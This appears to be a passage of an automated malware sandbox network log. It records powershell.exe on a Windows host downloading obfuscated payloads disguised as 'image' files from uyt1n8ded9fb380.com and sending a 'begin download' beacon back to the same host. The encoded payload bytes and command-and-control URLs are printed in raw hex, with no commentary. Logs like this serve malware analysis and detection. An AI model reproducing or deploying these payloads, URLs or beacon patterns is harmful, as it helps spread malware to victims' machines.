                                                                                  2024-11-08 09:40:54 UTC370OUTGET /file2/c6ae6756346c38969223ba2f8fc7c40738b6e97509be44a06793b0d51b847db1091341c2988cbc2948325b3d5107ab6c121c54393a4d1151e59a1757a8ed15e97d729c9eb010734e1d9643144208f8d481d97ea13050ba135c180aa98783c1f89d259370e7f69ec234172a1fc1dd60bf HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:40:55 UTC1056INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:55 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 2884
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ffFERngO2XjhO4WDS8fMggDIVUTwlrk7WiBR9%2F0rpB%2FNNvmhSJoR%2BDT0JmRJpQa%2Bd7DaVw26gdxEzdN%2B%2FkaEz7F5jB1BsjM0G4FenrVZ446TXwX002C5m35MUuxd2OzQXUCXMJY7EPGV"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10467&sent=17&recv=17&lost=0&retrans=0&sent_bytes=12406&recv_bytes=4919&delivery_rate=6465899&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49ab4ed086a58-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102195&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=37358&cwnd=252&unsent_bytes=0&cid=7c73c34fd8b34e67&ts=806&x=0"
                                                                                  2024-11-08 09:40:55 UTC313INData Raw: 25 60 76 79 74 6a 74 70 79 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 55 6f 71 4e 63 47 71 59 54 59 69 51 53 30 6d 35 56 6d 53 4a 63 47 71 70 5b 46 75 51 53 44 57 34 55 6f 71 6f 4f 54 38 44 56 55 4f 4e 64 6d 54 79 56 56 71 4e 63 47 6d 70 52 55 53 5b 60 6a 6a 7b 55 31 65 56 60 6d 6d 54 54 59 6d 4e 63 54 71 73 55 6a 53 5b 4c 44 30 54 58 32 65 4f 53 44 71 75 56 56 30 4e 60 6a 34 70 54 6c 71 60 53 30 5b 73 55 59 71 4a 63 47 6d 59 55 59 69 5b 60 6a 5b 70 55 30 65 4f 64 44 34 70 58 7b 53 5b 64 6a 44 30 55 31 53 46 63 44 35 78 54 6c 6d 4f 60 6a 47 35 55 6c 71 6f 65 31 38 54
                                                                                  Data Ascii: %`vytjtpyq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#UoqNcGqYTYiQS0m5VmSJcGqp[FuQSDW4UoqoOT8DVUONdmTyVVqNcGmpRUS[`jj{U1eV`mmTTYmNcTqsUjS[LD0TX2eOSDquVV0N`j4pTlq`S0[sUYqJcGmYUYi[`j[pU0eOdD4pX{S[djD0U1SFcD5xTlmO`jG5Ulqoe18T
                                                                                  2024-11-08 09:40:55 UTC1369INData Raw: 53 4b 4c 54 38 44 57 59 71 4e 53 31 34 71 55 30 65 47 4f 54 34 37 55 55 4b 5b 60 6a 71 72 55 6d 53 53 64 54 38 49 57 6c 79 4f 60 6d 47 35 56 56 30 52 60 30 71 59 56 55 47 60 63 57 6d 37 56 6d 53 4e 63 54 34 54 5b 7b 47 51 53 44 5b 73 55 59 71 43 4c 57 6d 70 53 6c 30 5b 64 6c 79 75 56 6d 65 5b 65 31 30 44 5b 46 75 4e 64 6c 75 34 55 59 71 47 60 54 38 32 4c 44 75 4a 53 31 34 33 5b 47 62 30 4c 44 6d 44 4c 46 65 4f 57 44 47 32 55 32 62 76 52 31 53 53 63 31 34 45 5b 7b 43 4d 56 6c 34 56 65 57 6a 7b 54 6f 43 68 4c 6b 53 6f 57 55 4b 56 65 57 71 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 77 52 54 5b 31 54 57 54 76 4e 56 6d 69 63 57 5b 70 5b 44 58 76 5b 31 71 49 64 49 5b 60 4c 45 47 37 56 6f 6d 43 62 44 53 53 63 31 34 45 60 54 47 6f 52
                                                                                  Data Ascii: SKLT8DWYqNS14qU0eGOT47UUK[`jqrUmSSdT8IWlyO`mG5VV0R`0qYVUG`cWm7VmSNcT4T[{GQSD[sUYqCLWmpSl0[dlyuVme[e10D[FuNdlu4UYqG`T82LDuJS143[Gb0LDmDLFeOWDG2U2bvR1SSc14E[{CMVl4VeWj{ToChLkSoWUKVeWqEPkeDTV8oRTOC[3OISom[W{CwRT[1TWTvNVmicW[p[DXv[1qIdI[`LEG7VomCbDSSc14E`TGoR
                                                                                  2024-11-08 09:40:55 UTC1202INData Raw: 4b 50 31 47 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 6d 44 76 52 31 6d 45 50 56 65 4b 50 55 43 4d 5b 6d 44 76 52 31 53 53 62 45 4f 69 53 33 79 7b 56 6d 4f 6f 60 30 6a 78 4e 55 47 68 63 6d 47 6f 55 47 65 6a 4c 44 6d 44 50 59 43 44 54 59 40 32 53 47 47 77 52 6a 53 53 63 31 71 6a 52 44 6e 30 5b 59 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 57 47 71 59 4f 56 75 4b 50 31 71 71 56 6d 65 6a 62 46 4b 71 50 6c 75 68 4c 33 53 30 58 6a 62 34 60 47 71 45 50 56 75 6a 56 44 71 76 52 56 71 7b 55 6a 4f 6f 60 31 71 4a 53 31 34 33 58 6c 34 52 63 46 4b 74 54 56 65 50 54 31 4b 4a 58 6c 34 60 65 6c 44 78 57 59 53 56 4c 6d 5b 71 57 56 30 56 64 46 53 59 57 6f 71 6a 50 31 47 31 57 6d 69 4a 62 44 6d 45 54 6b 47 6b 63 56 75 6f 55 47 5b 56 64 6d 71 57 52 6c
                                                                                  Data Ascii: KP1GNP3mC[1mEPVeKP1Go[mDvR1mEPVeKPUCM[mDvR1SSbEOiS3y{VmOo`0jxNUGhcmGoUGejLDmDPYCDTY@2SGGwRjSSc1qjRDn0[YbvR1mEPVeKP1GoRTOBWGqYOVuKP1qqVmejbFKqPluhL3S0Xjb4`GqEPVujVDqvRVq{UjOo`1qJS143Xl4RcFKtTVePT1KJXl4`elDxWYSVLm[qWV0VdFSYWoqjP1G1WmiJbDmETkGkcVuoUG[VdmqWRl


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.11.2049718104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:56 UTC290OUTPOST /d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c793735a86345f43847747bb26eb6681 HTTP/1.1
                                                                                  Content-Type: application/json
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  Content-Length: 308
                                                                                  2024-11-08 09:40:56 UTC308OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 75 79 74 31 6e 38 64 65 64 39 66 62 33 38 30 2e 63 6f 6d 2f 66 69 6c 65 32 2f 32 31 31 66 66 63 65 62 61 39 37 63 34 39 63 33 33 63 31 38 62 38 66 36 31 63 34 62 30 34 34 31 32 37 33 65 65 64 31 38 66 31 65 32 65 66 37 64 38 31 32 37 38 39 38 36 37 37 35 35 62 33 65 62 32 38 62 32 37 38 65 63 61 34 32 36 62 64 34 36 34 31 37 30 30 32 66 62 63 63 36 34 63 64 65 64 33 32 65 61 63 31 62 31 63 39 63 31 36 37 38 63 30 39 38 31 65 37 64 62 32 30 31 36 38 30 39 34 65 38 30 62 64 61 35 38 35 61 64 65 39 65 34 39 36 35 32 39 65 62 31 37 36 38 66 35 61 39 63 61 32 35 38 35 33 34 63 62 39 61 39 37 33 36 62 32 65 35 34 32 38 65 65 32 34 31 62 64 64 65 66 35 66 66 33 65
                                                                                  Data Ascii: [ "\"begin download https://uyt1n8ded9fb380.com/file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e
                                                                                  2024-11-08 09:40:56 UTC943INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:56 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fGuSgjMcUgDwr1GBo%2FtQpFODh54e0YjLO1qpPeTBPGqAde%2Fa535camssrk3N37TEcUPVsxFb0%2FuG4FChO72qgkjcB1UoCfTNwG3AKscsTjzPsKIABhPgHXzIZIt49shR%2BXVjSokPXq0g"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=10500&sent=3142&recv=1503&lost=0&retrans=0&sent_bytes=4394831&recv_bytes=8328&delivery_rate=58254364&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49abb6f7e41ec-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102064&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1258&delivery_rate=37457&cwnd=252&unsent_bytes=0&cid=16f18b07c08463c8&ts=806&x=0"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.11.2049719104.21.86.2194432012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-11-08 09:40:57 UTC370OUTGET /file2/211ffceba97c49c33c18b8f61c4b0441273eed18f1e2ef7d812789867755b3eb28b278eca426bd46417002fbcc64cded32eac1b1c9c1678c0981e7db20168094e80bda585ade9e496529eb1768f5a9ca258534cb9a9736b2e5428ee241bddef5ff3e3f58581d305b1fc9fef007d79231 HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                  Host: uyt1n8ded9fb380.com
                                                                                  2024-11-08 09:40:57 UTC1060INHTTP/1.1 200 OK
                                                                                  Date: Fri, 08 Nov 2024 09:40:57 GMT
                                                                                  Content-Type: application/octet-stream
                                                                                  Content-Length: 21774
                                                                                  Connection: close
                                                                                  content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kY6Rxp6et1fryxcwdKqBiOnd1o4iKQ1rqLA9xJw79d0LHfbp%2BYM874naVGzgxxsjPwTinVbY1lkLWx5VCZU%2Bdc%2F4pttfhHiV3xXaO9s4xo3HZUsrJrXuTVWOLzCKv0qKp0fVH8MKDiZ%2B"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=16678&sent=3144&recv=1505&lost=0&retrans=0&sent_bytes=4395581&recv_bytes=9336&delivery_rate=58254364&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  X-Powered-By: ARR/3.0
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8df49ac1dff1440c-EWR
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102137&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2848&recv_bytes=1008&delivery_rate=37434&cwnd=252&unsent_bytes=0&cid=e6bd5a81bd6434ce&ts=811&x=0"
                                                                                  2024-11-08 09:40:57 UTC309INData Raw: 25 70 62 66 6f 71 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6c 69 68 53 49 43 53 57 6b 47 6e 53 47 50 76 4f 57 6d 55 53 55 47 4f 52 54 50 76 5b 30 47 45 5b 32 43 51 65 7b 43 4d 53 47 47 76 63 56 53 59 4f 56 71 6a 53 33 79 33 58 6c 6d 42 57 6d 50 76 57 6a 53 55 60 33 69 69 54 6b 43 52 54 54 53 53 62 45 65 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 30 43 55 50 6a 47 6d 4c 7b 40 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 53 72 5b 57 4f 43 4e 54 6d 45 52 6a 53 68 4c 6b 54 76 56 6d 62 30 4c 44 79 56 54 6b 57 6b 53 30 57 71 55 32 62 76
                                                                                  Data Ascii: %pbfoq<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RlihSICSWkGnSGPvOWmUSUGORTPv[0GE[2CQe{CMSGGvcVSYOVqjS3y3XlmBWmPvWjSU`3iiTkCRTTSSbEeDTV8oRTOC[1qI`Fy[W0KrX34O[0CUPjGmL{@2SGGw[1mEPVeJS2Sr[WOCNTmERjShLkTvVmb0LDyVTkWkS0WqU2bv
                                                                                  2024-11-08 09:40:57 UTC1369INData Raw: 57 4b 60 6f 4f 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 50 30 4b 77 56 6d 65 46 60 30 71 58 52 6f 71 59 64 57 4b 78 56 6d 69 72 5b 44 6d 44 4c 46 65 4a 52 47 71 6e 58 6a 69 56 63 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 56 4f 75 60 33 65 50 54 31 47 71 58 54 69 52 4c 46 4f 48 55 55 5b 4c 64 55 6a 79 5b 57 69 53 64 46 4b 70 60 46 75 60 57 30 44 30 56 6c 30 4b 64 6a 38 44 50 59 57 5b 4c 6b 6d 31 55 45 4b 53 4c 31 34 54 53 59 6d 4f 64 6a 6a 79 55 55 4b 56 63 44 38 54 60 32 69 4e 57 47 6a 76 55 54 65 57 64 57 71 44 55 6c 30 4e 63 57 54 30 56 6d 53 4b 4f 47 6d 54 60 46 6d 4f 53 47 5b 73 56 6d 53 57 64 6a 34 70 53 55 43 4e 57 30 5b 70 55 59 71 57 4f 54 38 54 5b 46 6d 51 53 47 54 78 55 56 71 53 4c 6a 34 37 50 6c 71 4f 64 6a 6d 35 55 57 53 6e 60 44 38 54 52
                                                                                  Data Ascii: WK`oONP3bvR1mEPVeKP0KwVmeF`0qXRoqYdWKxVmir[DmDLFeJRGqnXjiVcD82LDuKP1GoRTORLVOu`3ePT1GqXTiRLFOHUU[LdUjy[WiSdFKp`Fu`W0D0Vl0Kdj8DPYW[Lkm1UEKSL14TSYmOdjjyUUKVcD8T`2iNWGjvUTeWdWqDUl0NcWT0VmSKOGmT`FmOSG[sVmSWdj4pSUCNW0[pUYqWOT8T[FmQSGTxUVqSLj47PlqOdjm5UWSn`D8TR
                                                                                  2024-11-08 09:40:57 UTC1369INData Raw: 4a 60 46 4b 44 62 47 47 56 4c 56 69 44 57 45 40 30 56 57 4f 47 4c 54 30 4c 63 59 69 72 58 6c 30 6a 4c 46 47 45 50 59 53 60 4c 30 47 6f 55 57 4f 73 55 6a 4f 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 5b 45 4f 4a 62 46 53 49 57 59 53 69 53 7b 6d 37 5b 44 4f 43 60 56 4c 78 57 6f 57 60 50 31 4b 7b 58 6b 4b 6b 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 57 6d 43 52 57 54 34 4d 54 31 5b 76 52 47 4b 46 50 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6a 4c 31 71 76 5b 44 65 57 65 46 47 49 4e 59 71 6a 50 31 47 71 56 55 4b 35 63 47 6d 58 52 56 65 68 53 7b 6d 74 52 56 71 7b 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 30 6e 78 64 49 5b 5b 63 54 5b 7b 55 33 79 42 56 47 65 47 55 6d 43 54 63 46 69 4b 57 47
                                                                                  Data Ascii: J`FKDbGGVLViDWE@0VWOGLT0LcYirXl0jLFGEPYS`L0GoUWOsUjOqPVeKP1H2SGGw[1mEPVeKP1Go[EOJbFSIWYSiS{m7[DOC`VLxWoW`P1K{XkKk`T82LDuKP1GoRTOC[1mFWmCRWT4MT1[vRGKFPUeDTV8oRTOC[1mEPVejL1qv[DeWeFGINYqjP1GqVUK5cGmXRVehS{mtRVq{UjOqPVeKP1GoRTOC`0nxdI[[cT[{U3yBVGeGUmCTcFiKWG
                                                                                  2024-11-08 09:40:57 UTC1369INData Raw: 63 56 79 30 56 6b 44 76 60 30 71 75 63 49 4f 60 57 6d 5b 34 58 6a 44 76 52 31 6d 45 50 56 65 4b 50 33 75 4e 50 33 62 76 52 31 6d 45 50 56 65 4b 53 6a 4b 58 54 57 5b 60 50 30 5b 56 53 6a 57 57 53 6a 30 6f 52 56 75 4a 63 47 6e 78 63 49 57 4b 53 57 4b 33 5b 45 48 30 62 33 48 78 53 6c 75 4b 50 30 4b 75 58 57 65 35 63 47 57 49 53 6b 43 69 50 31 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 64 54 4b 44 58 54 65 56 60 6c 47 34 50 6f 43 60 60 54 48 76 58 54 65 57 5b 30 71 75 63 49 4f 60 54 31 4b 72 5b 54 65 72 64 6c 53 48 55 54 34 45 60 54 47 6f 52 54 4f 42 62 47 71 71 50 56 38 4c 57 7b 57 33 5b 44 4f 43 63 30 5b 49 57 6f 71 6a 50 7b 47 53 56 57 69 52 63 31 6d 45 4c 57 47 5b 56 47 4b 77 52 54 4f 52 63 56 47 59 64 46 79 57 53 31 58 76 58 54 4f 73 62 44 6d 48 62 31 34
                                                                                  Data Ascii: cVy0VkDv`0qucIO`Wm[4XjDvR1mEPVeKP3uNP3bvR1mEPVeKSjKXTW[`P0[VSjWWSj0oRVuJcGnxcIWKSWK3[EH0b3HxSluKP0KuXWe5cGWISkCiP1j2SGGw[1mEPVeKdTKDXTeV`lG4PoC``THvXTeW[0qucIO`T1Kr[TerdlSHUT4E`TGoRTOBbGqqPV8LW{W3[DOCc0[IWoqjP{GSVWiRc1mELWG[VGKwRTORcVGYdFyWS1XvXTOsbDmHb14
                                                                                  2024-11-08 09:40:57 UTC517INData Raw: 57 6a 7b 54 6f 43 68 4c 6b 53 6f 54 6a 62 34 4c 33 4b 75 64 49 5b 5b 57 30 47 31 54 6c 30 72 62 30 71 57 56 6f 6d 68 4c 6b 47 56 58 33 30 32 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 69 42 60 46 4f 75 53 6f 53 4b 50 33 65 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 7b 4f 4e 4c 46 4f 75 63 49 57 60 4c 55 43 73 57 6d 69 4a 62 31 79 43 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6c 4b 6b 4c 30 4b 34 58 57 62 30 63 6d 69 55 54 6a 57 60 56 44 35 76 58 57 62 30 60 46 53 49 63 49 5b 68 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 60 31 34 45 5b 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6c 71 68 4c 30 5b 30 5b 44 4f 43 4e 54 6d 44 53 59 65 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 48 5b 46 38 69 57 32 69 72 52 31 4f 52 60 6c 48 7b 57 6f 57 6a 50 31 47 31 56 6b 4f 53
                                                                                  Data Ascii: Wj{ToChLkSoTjb4L3KudI[[W0G1Tl0rb0qWVomhLkGVX302[3W2LDuKP1GoRTiB`FOuSoSKP3eNP3mC[1mEPVeKP1GoW{ONLFOucIW`LUCsWmiJb1yCLDuKP1GoRTOC[1mEPlKkL0K4XWb0cmiUTjW`VD5vXWb0`FSIcI[h[{CMRTOC[1mE`14E[{CMRTOC[1mETlqhL0[0[DOCNTmDSYeQe{CMRTOC[1mH[F8iW2irR1OR`lH{WoWjP1G1VkOS
                                                                                  2024-11-08 09:40:58 UTC1369INData Raw: 65 4b 50 31 47 6f 52 54 4f 42 64 57 71 58 54 6b 47 6b 63 55 53 6f 52 6a 69 52 64 56 53 59 57 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 56 55 4b 46 4c 47 6a 78 5b 31 34 45 60 54 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 6d 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 57 46 5b 44 4b 56 60 31 71 56 57 57 57 52 54 57 57 34 50 56 75 58 64 55 57 46 5b 54 65 4e 63 46 4f 48 54 6f 43 68 4c 6b 53 30 57 47 65 56 64 6c 4c 78 53 6c 34 60 57 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 50 6d 69 53 57 6d 71 45 57 6d 5b 46 53 57 57 46 55 56 65 4b 60 30 5b 34 58 33 31 34 64 54 6d 49 54 6f 5b 6a 4c 6b 57 7b 58 6b 4b 46 60 31 6d 49 56
                                                                                  Data Ascii: eKP1GoRTOBdWqXTkGkcUSoRjiRdVSYWUeDTV8oRTOC[1mEPVeKRECNP3mC[1mEPVeKP1GoVUKFLGjx[14E`TGoRTOC[1mEPVeme{CMRTOC[1mEPVeKP1GoRTOC[0WF[DKV`1qVWWWRTWW4PVuXdUWF[TeNcFOHToChLkS0WGeVdlLxSl4`WIONP3mC[1mEPVeKP1GoRTOC[1mFPmiSWmqEWm[FSWWFUVeK`0[4X314dTmITo[jLkW{XkKF`1mIV
                                                                                  2024-11-08 09:40:58 UTC1369INData Raw: 73 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 33 5b 53 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 30 6f 57 6b 4f 4a 62 46 53 49 57 56 65 6a 53 33 69 72 52 54 65 56 65 57 6a 7b 52 6b 57 6b 52 47 4b 72 56 6a 4c 34 60 30 71 59 55 6f 6d 6d 56 44 48 76 56 6d 65 53 5b 30 6d 74 63 45 43 60 56 44 30 6f 5b 44 62 35 5b 33 53 49 60 46 79 4b 53 7b 6a 79 5b 44 69 42 4c 56 53 45 50 6c 30 69 57 32 69 72 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 5b 31 57 46 57 58 55 6b 43 60 57 7b 43 30 54 30 54 35 65 57 4b 75 63 49 4f 60 57 6b 40 33 55 33 79 6a 64 56 47 58 54 6c 79 53 57 32 69 7b 54 56 34 72 4c 47 71 58 55 56 38 4a 53 55 6a 79 5b 44 69 42 4c 56 53 47 56 6f 43 68 53 30 5b 53 56 57 69 52 63 31 79 45 50 56 75 60 63 56 79 7b 56 6d
                                                                                  Data Ascii: sUjOqPVeKP1GoRTOC[3[SLDuDTV8oRTOC[1mEPVeKP10oWkOJbFSIWVejS3irRTeVeWj{RkWkRGKrVjL4`0qYUommVDHvVmeS[0mtcEC`VD0o[Db5[3SI`FyKS{jy[DiBLVSEPl0iW2irSGGw[1mEPVeKP1GoRT[1WFWXUkC`W{C0T0T5eWKucIO`Wk@3U3yjdVGXTlySW2i{TV4rLGqXUV8JSUjy[DiBLVSGVoChS0[SVWiRc1yEPVu`cVy{Vm
                                                                                  2024-11-08 09:40:58 UTC1369INData Raw: 53 30 5b 7b 56 6d 69 52 63 44 6d 48 54 6c 38 60 54 31 4b 75 58 57 65 35 63 44 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 52 6c 79 68 57 7b 6a 78 56 6d 4c 79 52 6c 53 49 57 6f 53 4b 50 7b 47 53 56 57 69 52 63 31 6d 45 54 6c 30 69 57 32 69 72 57 54 65 46 4c 46 47 45 50 59 53 52 63 55 6d 34 56 55 4b 57 55 6a 4f 71 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 30 57 46 5b 44 4b 56 60 31 71 56 57 57 57 52 54 57 57 34 50 56 6d 52 63 56 79 7b 56 6d 4f 42 60 30 71 59 64 46 79 6a 53 30 5b 73 55 33 6d 43 60 30 71 75 63 49 4f 60 57 6a 4b 6e 5b 44 65 6f 5b 30 6d 59 4f 56 75 4b 53 31 71 72 56 6b 4b 72 65 54 6d 49 55 6c 38 60 57 31 34 78 52 56 62 76 52 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 55 43 4d 52 54 4f 43 5b 31 6d 48 4c 44 34
                                                                                  Data Ascii: S0[{VmiRcDmHTl8`T1KuXWe5cDSSc3eKP1GoRTOC[1mFRlyhW{jxVmLyRlSIWoSKP{GSVWiRc1mETl0iW2irWTeFLFGEPYSRcUm4VUKWUjOqPVeKP1GoRTOC[0WF[DKV`1qVWWWRTWW4PVmRcVy{VmOB`0qYdFyjS0[sU3mC`0qucIO`WjKn[Deo[0mYOVuKS1qrVkKreTmIUl8`W14xRVbvR1SSc3eKP1GoRTOC[1mEPVeKPUCMRTOC[1mHLD4
                                                                                  2024-11-08 09:40:58 UTC1369INData Raw: 57 71 53 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6b 6d 44 54 56 38 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 59 6d 42 56 47 6d 59 63 45 43 4b 53 30 71 33 58 33 6d 42 60 44 6d 48 55 6c 38 68 4c 31 6e 76 52 54 65 72 65 56 53 49 57 6f 6d 6a 63 54 5b 7b 52 54 65 4a 63 47 71 75 4e 59 6d 60 54 31 4b 70 58 54 65 56 60 6c 44 78 63 49 57 60 64 54 4b 6e 56 6b 4b 46 62 46 4b 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 6a 53 31 5b 34 5b 44 4c 79 57 46 4b 49 57 6c 79 6b 50 31 47 31 57 55 4b 56 60 6c 48 78 4f 56 75 6b 64 54 47 35 55 32 62 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 60 33 4b 75 57 6b 4f 56 53 33 79 31 56 6d 4f 43 4e 54 6d 47 5b 46 79 6a 50 7b 47 47 56 57 69 52 63 44 38 32 4c 44 75 4b 50 31 47 6f 52 54 66 76
                                                                                  Data Ascii: WqSLDuKP1GoRTOC[1mEPkmDTV8NP3mC[1mEPVeKP1GoRYmBVGmYcECKS0q3X3mB`DmHUl8hL1nvRTereVSIWomjcT[{RTeJcGquNYm`T1KpXTeV`lDxcIW`dTKnVkKFbFKoLDuKP1GoRTOC[1mEPmSjS1[4[DLyWFKIWlykP1G1WUKV`lHxOVukdTG5U2bvR1mEPVeKP1GoRTOC`3KuWkOVS3y1VmOCNTmG[FyjP{GGVWiRcD82LDuKP1GoRTfv
                                                                                  2024-11-08 09:40:58 UTC1369INData Raw: 69 6b 57 55 4f 72 64 6c 53 49 57 6f 53 4d 54 7b 57 46 58 6c 30 46 60 56 4b 49 57 6a 30 56 57 54 54 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 55 43 4d 52 54 4f 43 5b 31 6d 49 63 46 30 4d 50 30 4b 76 58 7b 47 56 50 6d 44 76 4e 59 65 60 57 7b 53 6f 55 47 65 56 64 44 6d 44 53 59 43 44 54 56 38 6f 52 54 4f 43 5b 33 57 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 75 69 56 44 34 56 54 57 57 4e 54 46 4f 49 57 6f 57 4b 53 45 43 6f 52 31 57 6a 63 46 53 45 4c 54 71 6a 53 30 5b 31 57 54 69 4a 65 6c 4f 49 57 6f 6d 6a 52 46 75 6f 54 31 57 31 55 57 53 54 62 46 4f 57 4c 6b 6d 75 5b 44 69 6a 60 46 4f 75 57 6c 4f 54 57 33 79 70 58 33 31 34 64 6c 48 78 56 6b 43 58 53 6c 53 76 58 6c 30 52 65 6c 50 7b 55 6c 4f 53 4c 30 5b 34 58 33 